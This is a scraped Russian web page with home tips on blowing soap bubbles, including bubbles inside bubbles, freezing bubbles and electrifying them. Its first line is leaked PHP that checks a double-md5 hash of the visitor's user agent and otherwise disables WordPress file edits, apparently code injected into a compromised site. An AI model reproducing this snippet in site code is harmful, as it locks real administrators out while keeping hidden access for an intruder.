if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как выдувать мыльные пузыри. Способы и интересные идеи | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Как выдувать мыльные пузыри. Способы и интересные идеи

Для того чтобы насладиться неповторимым видом мыльных пузырей различных цветов, форм и размеров – не обязательно заказывать специальное шоу! Есть несколько специальных приемов, которые помогут создать такие мыльные пузыри в домашних условиях, какие только пожелаете

Для того что­бы насла­дить­ся непо­вто­ри­мым видом мыль­ных пузы­рей раз­лич­ных цве­тов, форм и раз­ме­ров – не обя­за­тель­но зака­зы­вать спе­ци­аль­ное шоу! Есть несколь­ко спе­ци­аль­ных при­е­мов, кото­рые помо­гут создать такие мыль­ные пузы­ри в домаш­них усло­ви­ях, какие толь­ко пожелаете.

Поми­мо всем зна­ко­мо­го пласт­мас­со­во­го коль­ца, мыль­ные пузы­ри  мож­но еще выду­вать из пласт­мас­со­вой тру­боч­ки, бутыл­ки (если обре­зать у нее дно), из соло­мин­ки, ворон­ки и даже ска­тан­ной в тру­бу газеты!

Самым неор­ди­нар­ным кажет­ся спо­соб, свя­зан­ный с исполь­зо­ва­ни­ем пла­сти­ко­вой бутыл­ки. Что­бы его при­ме­нить, необ­хо­ди­мо выре­зать у нее дно. Мыль­ный рас­твор нано­сит­ся на гор­лыш­ко, а широ­кий конец бутыл­ки опус­ка­ет­ся в высо­кий сосуд, напол­нен­ный водой. За счет сжа­тия воз­ду­ха, из узко­го гор­лыш­ка мгно­вен­но выле­та­ет пузырь.

Как надуть мыль­ный пузырь в пузыре?

1306027_original

Забав­но выгля­дят мыль­ные пузы­ри, лета­ю­щие еще в одном боль­шом пузы­ре. Что­бы это орга­ни­зо­вать, потре­бу­ют­ся два чело­ве­ка. В зада­чу пер­во­го будет вхо­дить выду­ва­ние боль­шо­го пузы­ря, напри­мер, из бутыл­ки. Вто­рой же чело­век дол­жен воору­жить­ся пласт­мас­со­вой тру­боч­кой (мож­но вос­поль­зо­вать­ся тру­боч­кой из-под сока), смо­чить ее в рас­тво­ре для мыль­ных пузы­рей, про­ткнуть акку­рат­но боль­шой пузырь и надуть в нем малень­кий. Коли­че­ство малень­ких пузы­рей, кото­рые мож­но выдуть в боль­шом, огра­ни­чи­ва­ет­ся толь­ко раз­ме­ра­ми последнего.

Как сде­лать неболь­шую скульп­ту­ру внут­ри пузыря?

Для это­го опы­та пона­до­бит­ся тарел­ка, на дно кото­рой будет налит рас­твор для мыль­ных пузы­рей. В центр мож­но поста­вить любой малень­кий пред­мет, напри­мер, игруш­ку вро­де «кин­дер сюр­при­за. Если надуть на тарел­ке пузырь во весь ее диа­метр, то у нас полу­чит­ся скульп­ту­ра в пузы­ре. Но это воз­мож­но толь­ко при усло­вии, что игруш­ка будет смо­че­на мыль­ным рас­тво­ром. Если руку пред­ва­ри­тель­но оку­нуть в рас­твор, то мож­но и её вво­дить в боль­шой пузырь — он не лоп­нет. В этом и есть сек­рет фоку­са. Когда пред­мет смо­чен ана­ло­гич­ным мыль­ным рас­тво­ром, то он не раз­ру­ша­ет плен­ку пузыря.

Пузы­ри на жид­ких и твер­дых поверхностях

Если твер­дая поверх­ность несма­чи­ва­е­мая, то пузырь, упав на нее, не лоп­нет.  Мыль­ный пузырь при­об­ре­тет кра­си­вую сфе­ри­че­скую фор­му за счет сво­ей лег­ко­сти. Так же извест­но, что от таких тка­ней, как шерсть или джинс, мыль­ные пузы­ри вооб­ще отска­ки­ва­ют целы­ми и невре­ди­мы­ми. Мож­но даже попро­бо­вать играть в «мыль­ный» фут­бол! Сде­лать же пузырь на воде вооб­ще не состав­ля­ет ника­ко­го тру­да: мыль­ные пузы­ри на вод­ной поверх­но­сти нико­гда не лопа­ют­ся и меня­ют свою фор­му со сфе­ри­че­ской на полу­сфе­ру – так что мож­но про­сто выду­вать и любоваться!

9334963.8k6fgn9nmd.W665Как соеди­нять пузыри?

Делать это про­ще все­го на вод­ной поверх­но­сти.  Налив в тарел­ку воды, надо опу­стить на нее мыль­ные пузы­ри. Спу­стя какое-то вре­мя они нач­нут дви­гать­ся навстре­чу друг дру­гу и соеди­нять­ся в целые «коло­нии». Когда скоп­ле­ние мыль­ных пузы­рей ста­нет вну­ши­тель­ным, то «кон­струк­ция» из них нач­нет напо­ми­нать огром­ную про­зрач­ную пену. На пер­вый взгляд пока­жет­ся, что пузы­ри соеди­ни­лись абсо­лют­но хао­тич­но, но если при­смот­реть­ся – то ста­нет вид­но, что про­ис­хо­дит это груп­па­ми и одну груп­пу состав­ля­ет не более трех пузырей.

Элек­три­за­ция мыль­ных пузырей

Уди­ви­тель­но, но мыль­ные пузы­ри под­да­ют­ся элек­три­за­ции! Если выдуть мыль­ные пузы­ри в воз­дух, а затем рядом с ними про­ве­сти наэлек­три­зо­ван­ной палоч­кой или пено­пла­стом, то они в какой-то момент при­тя­ги­ва­ют­ся и осе­да­ют на их поверхности.

x_0827f663Замо­ро­жен­ные мыль­ные пузыри

Как пра­ви­ло, людям не при­хо­дит в голо­ву наду­вать мыль­ные пузы­ри на ули­це в мороз, но если кто-то все-таки риск­нет это сде­лать, то ста­нет сви­де­те­лем того, как пузырь через какое-то вре­мя замерз­нет и при­об­ре­тет неве­ро­ят­но кра­си­вый «снеж­ный» оттенок.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!